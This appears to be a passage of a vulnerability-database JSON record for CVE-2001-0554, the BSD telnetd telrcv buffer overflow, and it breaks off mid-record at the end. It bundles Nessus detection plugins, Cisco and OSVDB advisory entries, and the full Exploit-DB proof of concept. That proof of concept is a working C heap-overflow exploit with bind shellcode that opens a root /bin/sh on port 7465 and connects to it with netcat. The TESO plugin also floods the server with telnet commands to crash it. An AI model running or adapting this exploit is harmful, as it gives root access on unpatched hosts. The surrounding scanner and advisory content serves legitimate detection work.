script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"telnet-0.16-4.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"telnet-server-0.16-4.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"telnet-0.17-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"telnet-server-0.17-7.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"telnet-0.17-7.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"telnet-server-0.17-7.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:33:40", "description": "The Telnet server does not return an expected number of replies when\nit receives a long sequence of 'Are You There' commands. This\nprobably means it overflows one of its internal buffers and crashes. 
\nThis could likely lead to arbitrary code execution.", "edition": 23, "published": "2001-07-24T00:00:00", "title": "BSD Based telnetd telrcv Function Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "TESO_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/10709", "sourceData": "#\n# Test TESO in.telnetd buffer overflow\n#\n# Copyright (c) 2001 Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n# Permission to copy, modify, and redistribute this script under\n# the terms of the GNU General Public License is hereby granted.\n#\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# <noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\n# Changes by Tenable:\n# - Revised plugin title, changed family (8/19/09)\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(10709);\n script_version (\"1.34\");\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n \n script_name(english:\"BSD Based telnetd telrcv Function Remote Command Execution\");\n \n# http://www.team-teso.net/advisories/teso-advisory-011.tar.gz is dead\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote telnet server may be vulnerable to a buffer overflow\nattack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The Telnet server does not return an expected number of replies when\nit receives a long sequence of 'Are You There' commands. This\nprobably means it overflows one of its internal buffers and crashes. 
\nThis could likely lead to arbitrary code execution.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the telnet service by, for example, commenting out the\n'telnet' line in /etc/inetd.conf.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/07/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/07/18\");\n script_cvs_date(\"Date: 2018/08/01 17:36:12\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Attempts to overflow the Telnet server buffer\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Pavel Kankovsky\");\n script_family(english:\"Gain a shell remotely\");\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencie(\"find_service1.nasl\", \"ms_telnet_overflow.nasl\");\n\n script_require_ports(\"Services/telnet\", 23);\n exit(0);\n}\n\n#\n# The script code starts here.\n#\ninclude('telnet_func.inc');\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. 
Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n local_var a, bytes, i, newstate, num, state;\n\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. 
comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n local_var bomb, r, size, soc, succ, total;\n\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # wierd BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) { \n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total - 4)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\n#\n# The main program.\n#\n\nport = get_kb_item(\"Services/telnet\");\nif (!port) port = 23;\n\nif (get_port_state(port)) {\n banner = get_telnet_banner(port:port);\n if (\"Welcome to Microsoft Telnet Service\" >< banner) exit(0);\n\n success = attack(port:port, negotiate:0);\n if (success <= 0) success = attack(port:port, negotiate:1);\n if (success > 0) security_hole(port);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T15:30:21", "description": "Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow. CVE-2001-0554. 
Remote exploit for unix platform", "published": "2001-07-18T00:00:00", "type": "exploitdb", "title": "Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0554"], "modified": "2001-07-18T00:00:00", "id": "EDB-ID:21018", "href": "https://www.exploit-db.com/exploits/21018/", "sourceData": "source: http://www.securityfocus.com/bid/3064/info\r\n\r\nA boundary condition error exists in telnet daemons derived from the BSD telnet daemon.\r\n\r\nUnder certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function responsible for processing the options prepares a response within a fixed sized buffer, without performing any bounds checking.\r\n\r\nThis vulnerability is now being actively exploited. A worm is known to be circulating around the Internet. \r\n\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n\r\n/*********************************************************************\r\n Proof of concept netkit-0.17-7 local root exploit.\r\n\r\n Exploits buffer overflow in the AYT handling of in.telnetd, \r\n due to bad logic in the handling of snprintf(), and \r\n\r\n TESO advisory details were enough to allow me to put \r\n controlable addresses in arbitary heap locations. \r\n\r\n Heap based exploit. Overflow allows rewriting of some heap \r\n data, which allowed me to put a new heap structure in the \r\n input buffer, which let me do whatever I want.\r\n\r\n'traceroute exploit story - By Dvorak, Synnergy Networks' was very\r\n helpful. Also malloc.c was good. 
\r\n\r\n*********************************************************************/\r\n/*\r\n Notes about exploit \r\n\r\n1) RedHat 7.0, exploiting localhost\r\n2) hostname is clarity.local\r\n3) It probably won't work without at least a different setting for\r\n the --size option, and probably the --name option as well. The\r\n --name arguemnt is the hostname part of the string that gets \r\n returned by the AYT command, which may be different to the name\r\n of the address you are connecting to..\r\n4) There are a lot of things that use the heap, making the size \r\n depend on alot of factors. \r\n\r\n5) You will might need to change some (or all) of the offsets. \r\n This program does allow you to brute force, if the hostname returned \r\n by the AYT command is not a multiple of 3 letters long.\r\n \r\n It is also possibly (at least according to some quick testing I did)\r\n exploitable on some (all?) servers with names that are multiples of three\r\n letters long, using the Abort Output command to add 2 characters to the\r\n output length, and exploit the heap in a similar manner to this method.\r\n \r\n (You can only directly put user controlable characters in 2 out of 3\r\n locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO\r\n will give you 2 more than a multiple of 3 bytes) with controllable\r\n characters, but when you count the null added by the netoprintf(), and use\r\n 0 as an option to a do or will, you can sometimes create valid chunks that\r\n point to locations you can control. I have only tested this method with a \r\n simulation, but it seems it would probably work with the telnetd as well.\r\n I will look into it when I have time. Maybe.)\r\n \r\n\r\n . . _ _ _ _ . . _ _ _ . .\r\n |_ _|_ _|_ _ . / / |\\/| |_| _| | | ||\\/| / | | ||_ | |\r\n | | | | |_|. 
/ / | | | _|.|_ |_|| | / |_ |_| _| \\/ \r\n |\r\n *********************************************************************/\r\n\r\n\r\n\r\n\r\n#define SERVER_PORT 23\r\n\r\n#define ENV 18628\r\n\r\nint offset12[] = {\r\n// netibuf[343]->the chunk start.\r\n -4, 0xaa,\r\n -5, 0xbb,\r\n -6, 0xcc,\r\n -7, 0x10,\r\n -9, 0xdd,\r\n -10, 0x68,\r\n -12, 0xee,\r\n -13, 0x88,\r\n -14, 0x99,\r\n 0, 0x00\r\n};\r\n\r\nint offset3[]={\r\n-1,0x00,\r\n0,0\r\n};\r\n\r\nint *offsets=offset12;\r\n\r\n\r\nint dalen = 0;\r\nint big;\r\nint small;\r\nint mipl = 0;\r\nint ninbufoffset;\r\nchar spinchars[] = \"/|\\\\-\";\r\n\r\nchar tosend[] = {\r\n 0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20,\r\n 0xff, 0xfb, 0x21, 0xff, 0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,\r\n 0xff, 0xfb, 0x23, 0\r\n};\r\n\r\nchar lamagra_bind_code[] =\r\n// the NOPs are my part... to jump over the modified places, \r\n// without me having to take a look to see where they are.\r\n// Modified to listen on 7465 == TAGS and work thru TELNET protocol.\r\n \"\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\\xeb\\x20\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x89\\xe5\\x31\\xd2\\xb2\\x66\\x89\\xd0\\x31\\xc9\\x89\\xcb\\x43\\x89\\x5d\\xf8\"\r\n \"\\x43\\x89\\x5d\\xf4\\x4b\\x89\\x4d\\xfc\\x8d\\x4d\\xf4\\xcd\\x80\\x31\\xc9\\x89\"\r\n 
\"\\x45\\xf4\\x43\\x66\\x89\\x5d\\xec\\x66\\xc7\\x45\\xee\\x1d\\x29\\x89\\x4d\\xf0\"\r\n \"\\x8d\\x45\\xec\\x89\\x45\\xf8\\xc6\\x45\\xfc\\x10\\x89\\xd0\\x8d\\x4d\\xf4\\xcd\"\r\n \"\\x80\\x89\\xd0\\x43\\x43\\xcd\\x80\\x89\\xd0\\x43\\xcd\\x80\\x89\\xc3\\x31\\xc9\"\r\n \"\\xb2\\x3f\\x89\\xd0\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\xeb\\x18\\x5e\\x89\\x75\"\r\n \"\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x45\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4d\\x08\"\r\n \"\\x8d\\x55\\x0c\\xcd\\x80\\xe8\\xe3\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff/bin/sh\";\r\n\r\nchar *shellcode = lamagra_bind_code;\r\n\r\nint sock;\t\t\t/* fd for socket connection */\r\nFILE *dasock;\t\t\t/* for doing fprint et al */\r\nstruct sockaddr_in server;\t/* the server end of the socket */\r\nstruct hostent *hp;\t\t/* Return value from gethostbyname() */\r\nchar buf[40960];\t\t/* Received data buffer */\r\nchar sock_buf[64 * 1024];\t/* Received data buffer */\r\n\r\nchar daenv[10000];\r\nchar oldenv[10000];\r\n\r\nextern int errno;\r\nread_sock ()\r\n{\r\n /* Prepare our buffer for a read and then read. */\r\n bzero (buf, sizeof (buf));\r\n if (read (sock, buf, sizeof (buf)) < 0)\r\n if (errno != 11)\r\n {\r\n\tperror (\"! Socket read\");\r\n\texit (1);\r\n }\r\n}\r\n\r\nsock_setup ()\r\n{\r\n int flags;\r\n int yes = 1;\r\n if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n perror (\"! Error making the socket\\n\");\r\n exit (1);\r\n }\r\n bzero ((char *) &server, sizeof (server));\r\n server.sin_family = AF_INET;\r\n if ((hp = gethostbyname (\"localhost\")) == NULL)\r\n {\r\n fprintf (stderr, \"! localhost unknown??\\n\");\r\n exit (1);\r\n }\r\n bcopy (hp->h_addr, &server.sin_addr, hp->h_length);\r\n server.sin_port = htons ((u_short) SERVER_PORT);\r\n\r\n /* Try to connect */\r\n if (connect (sock, (struct sockaddr *) &server, sizeof (server)) < 0)\r\n {\r\n perror (\"! Error connecting\\n\");\r\n exit (1);\r\n }\r\n\r\n dasock = (FILE *) fdopen (sock, \"w+\");\r\n if (!dasock)\r\n {\r\n perror (\"! 
Bad fdopen happened\");\r\n exit (1);\r\n }\r\n\r\n/****************************************\r\n Thanks to xphantom for the next 4 lines.\r\n (which i don't need anymore ;? )\r\n \r\n flags = fcntl(sock, F_GETFL, 0); \r\n flags |= O_NONBLOCK; \r\n fcntl(sock, F_SETFL, flags);\r\n if (setsockopt(sock, SOL_SOCKET, SO_OOBINLINE, &yes,sizeof(yes)) == -1) {\r\n perror(\"setsockopt\");\r\n exit(1);\r\n } \r\n*****************************************/\r\n\r\n\r\n setbuffer (dasock, sock_buf, 64 * 1024);\r\n\r\n}\r\n\r\ndo_iac (char c)\r\n{\r\n putc (0xff, dasock);\r\n putc (c, dasock);\r\n}\r\n\r\ndo_ayt ()\r\n{\r\n do_iac (0xf6); // sets buffer length to 2\r\n}\r\n\r\ndoo (char c)\r\n{\r\n putc (255, dasock);\r\n putc (253, dasock);\r\n putc (c, dasock);\r\n}\r\nwill (char c)\r\n{\r\n putc (255, dasock);\r\n putc (251, dasock);\r\n putc (c, dasock);\r\n}\r\nwont (char c)\r\n{\r\n putc (255, dasock);\r\n putc (252, dasock);\r\n putc (c, dasock);\r\n}\r\n\r\nvoid\r\nsolve (int remain)\r\n{\r\n int x, y;\r\n big = -100;\r\n small = -100;\r\n for (x = 0; x < 120; x++)\r\n for (y = 2; y < 80; y++)\r\n {\r\n\tif (((y * 3) + (x * dalen)) == remain)\r\n\t {\r\n\t big = x;\r\n\t small = y;\r\n\t return;\r\n\t }\r\n }\r\n fprintf (stderr, \"I still can't work it out.\\n\\n\");\r\n exit (1);\r\n}\r\n\r\npush_clean ()\r\n{\r\n int l;\r\n for (l = 0; l < 8192; l++)\r\n putc (0, dasock);\t\r\n}\r\n\r\npush_heap_attack ()\r\n{\r\n int l;\r\n int shaddr = 0x805c970;\r\n int overwrite = 0x08051e78;\t// fopen\r\n int tosend[] = {\r\n 0x805670eb,\r\n 0x8,\r\n shaddr,\r\n shaddr,\r\n 0x0,\r\n 0x0,\r\n overwrite - 12,\r\n shaddr\r\n };\r\n fwrite (shellcode, strlen (shellcode), 1, dasock);\r\n for (l = strlen (shellcode); l < 289 + ninbufoffset; l++)\r\n putc (0, dasock);\r\n fwrite (tosend, 8, 4, dasock);\r\n fflush (dasock);\r\n}\r\n\r\nfill2 (int count, char with, int real)\r\n{\r\n int l;\r\n int first, rest, find;\r\n\r\n first = (int) (count / dalen) - 10;\r\n rest = (int) (((count) % 
dalen) / 3) * 3;\r\n find = count - ((first * dalen) + (rest * 3));\r\n solve (find);\r\n first += big;\r\n rest += small;\r\n for (l = 0; l < first; l++)\r\n do_ayt ();\r\n for (l = 0; l < rest; l++)\r\n will (with);\r\n if (real == 1)\r\n {\r\n push_clean ();\r\n }\r\n}\r\n\r\nfill (int count, char with)\r\n{\r\n fprintf (stderr, \" o Length %d char %d (%02x)\\n\",\r\n\t count, with & 0xff, with & 0xff);\r\n fflush (stderr);\r\n fill2 (8257, 'z', 0);\t\t// first part\r\n fill2 (count - 8257, with, 1);\t// do it for real\r\n}\r\n\r\ndoenv (char *danam, char *daval)\r\n{\r\n sprintf (daenv, \"%c%c%c%c%c%s%c%s%c%c\",\r\n /* IAC SB N-E IS VAR name VAL value IAC SE */\r\n\t 255, 250, 39, 0, 0, danam, 1, daval, 255, 240);\r\n\r\n fwrite (daenv, 512, 1, dasock);\r\n fflush (dasock);\r\n}\r\n\r\nmain (int argc, char *argv[])\r\n{\r\n int br, l, dosleep = 0;\r\n int percent = 0;\r\n char spin;\r\n unsigned char w;\r\n bzero (oldenv, sizeof (oldenv));\r\n argv++;\r\n dalen = strlen (\"clarity.local\");\r\n while (argv[0])\r\n {\r\n if (!strcmp (argv[0], \"--pause\"))\r\n\tdosleep = 1;\r\n\r\n if (!strcmp (argv[0], \"--size\") && argv[1])\r\n\t{\r\n\t mipl = atoi (argv[1]);\r\n\t argv++;\r\n\t}\r\n\r\n if (!strcmp (argv[0], \"--name\") && argv[1])\r\n\t{\r\n\t dalen = strlen (argv[1]);\r\n\t argv++;\r\n\t}\r\n argv++;\r\n }\r\n fprintf (stderr, \" o MiPl of %4d o NameLen of %2d\\n\", mipl, dalen);\r\n if(dalen%3==0)\r\n {\r\n offsets=offset3;\r\n }\r\n else\r\n {\r\n ninbufoffset = mipl % 8192;\r\n offsets[11] += 32 * (mipl - ninbufoffset) / 8192;\r\n if (offsets[11] > 255)\r\n {\r\n fprintf (stderr, \" ! 
MiPl too big.\", mipl, dalen);\r\n exit (1);\r\n }\r\n }\r\n sock_setup ();\r\n if (dosleep)\r\n {\r\n system (\"sleep 1;ps aux|grep in.telnetd|grep -v grep\");\r\n sleep (8);\r\n }\r\n\r\n dalen += strlen (\"\\r\\n[ : yes]\\r\\n\");\r\n fprintf (stderr, \"o Sending IAC WILL NEW-ENVIRONMENT...\\n\");\r\n fflush (stderr);\r\n doo (5);\r\n will (39);\r\n fflush (dasock);\r\n read_sock ();\r\n fprintf (stderr, \"o Setting up environment vars...\\n\");\r\n fflush (stderr);\r\n will (1);\r\n push_clean ();\r\n doenv (\"USER\", \"zen-parse\");\r\n doenv (\"TERM\", \"zen-parse\");\r\n will (39);\r\n fflush (dasock);\r\n fprintf (stderr, \"o Doing overflows...\\n\");\r\n fflush (stderr);\r\n for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)\r\n {\r\n fill (mipl + ENV + offsets[br], offsets[br + 1]);\r\n fflush (dasock);\r\n usleep (100000);\r\n read_sock ();\r\n }\r\n fprintf (stderr, \"o Overflows done...\\n\");\r\n fflush (stderr);\r\n push_clean ();\r\n\r\n fprintf (stderr, \"o Sending IACs to start login process...\\n\");\r\n fflush (stderr);\r\n wont (24);\r\n wont (32);\r\n wont (35);\r\n fprintf (dasock, \"%s\", tosend);\r\n will (1);\r\n push_heap_attack ();\r\n sleep (1);\r\n fprintf (stderr, \"o Attempting to lauch netcat to localhost rootshell\\n\");\r\n execlp (\"nc\", \"nc\", \"-v\", \"localhost\", \"7465\", 0);\r\n fprintf (stderr,\r\n\t \"o If the exploit worked, there should be an open port on 7465.\\n\");\r\n fprintf (stderr, \" It is a root shell. You should probably close it.\\n\");\r\n fflush (stderr);\r\n sleep (60);\r\n exit (0);\r\n}\r\n/********************************************************************\r\n\r\n Thanks to xphantom for the help with getting the some of the socket \r\n stuff working properly. Erm. I didn't end up using that method, but\r\n thanks anyway. 
;]\r\n\r\nThis code is Copyright (c) 2001 zen-parse\r\nUse and distribution is unlimited, provided the code is not modified.\r\nIf the code, including any of text is modified, that version may not\r\nbe redistrubuted.\r\n\r\n********************************************************************/\r\n/* ObPlug 4 My Band: gone platinum, Chapel of Stilled voices, from */\r\n/********************************************************************\r\n Remember to visit Chapel of Stilled Voices:\r\n _ _ _ . .\r\n |_ _|_ _|_ _ . / /. . _ _| _ _ . . / | _ |_ | |\r\n | | | | |_|. / / |\\/| |_| _|.|_ |_||\\/| / |_ |_| _| \\/ \r\n - - - - - - -|- - - - - - -|- - - - - - - - - - - - - - - - - -\r\n | |\r\nIf there is anything below the next line someone is not following the\r\nrules. --zen-parse\r\n************************************END*****************************/\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21018/"}], "cisco": [{"lastseen": "2020-12-24T11:42:15", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "", "modified": "2002-09-03T15:00:00", "published": "2002-09-03T15:00:00", "id": "CISCO-SA-20020903-VPN3K-VULNERABILITY", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020903-vpn3k-vulnerability", "type": "cisco", "title": "Cisco VPN 3000 Concentrator Multiple Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T11:42:16", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "description": "", "modified": "2002-01-29T15:00:00", "published": "2002-01-29T15:00:00", "id": "CISCO-SA-20020129-CATOS-TELRCV", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020129-catos-telrcv", "type": "cisco", "title": "Cisco CatOS Telnet Buffer Vulnerability", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0554"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nContact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.securityfocus.com/advisories/3610)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2001-07/0776.html)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20010801-01-P)\n[Vendor Specific Advisory URL](http://www.securityfocus.com/advisories/3543)\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2001-030.0.txt)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200410-03.xml)\n[Vendor Specific Advisory URL](http://web.mit.edu/kerberos/www/advisories/telnetd.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2001:093)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000413)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml)\n[Vendor Specific Advisory 
URL](http://www.cisco.com/warp/public/707/vpn3k-multiple-vuln-pub.shtml)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2001/dsa-070)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2001/dsa-075)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2001:068)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2001-099.html)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=25631)\n[Vendor Specific Advisory URL](ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2001-100.html)\nSnort Signature ID: 1252\nSnort Signature ID: 1253\nOther Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2001-07/att-0611/01-spadv03.txt\nOther Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2001-07/0351.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0631.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0562.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0559.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-07/0599.html\nISS X-Force ID: 6875\n[CVE-2001-0554](https://vulners.com/cve/CVE-2001-0554)\nCIAC Advisory: l-128\nCIAC Advisory: l-131\nCIAC Advisory: l-124\nCIAC Advisory: m-006\nCERT VU: 745371\nCERT: CA-2001-21\nBugtraq ID: 3064\n", "modified": "2001-07-18T00:00:00", "published": "2001-07-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:809", "id": "OSVDB:809", "title": "Multiple BSD Telnet Option Handling Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "cvelist": ["CVE-2004-0911", "CVE-2001-0554"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in 
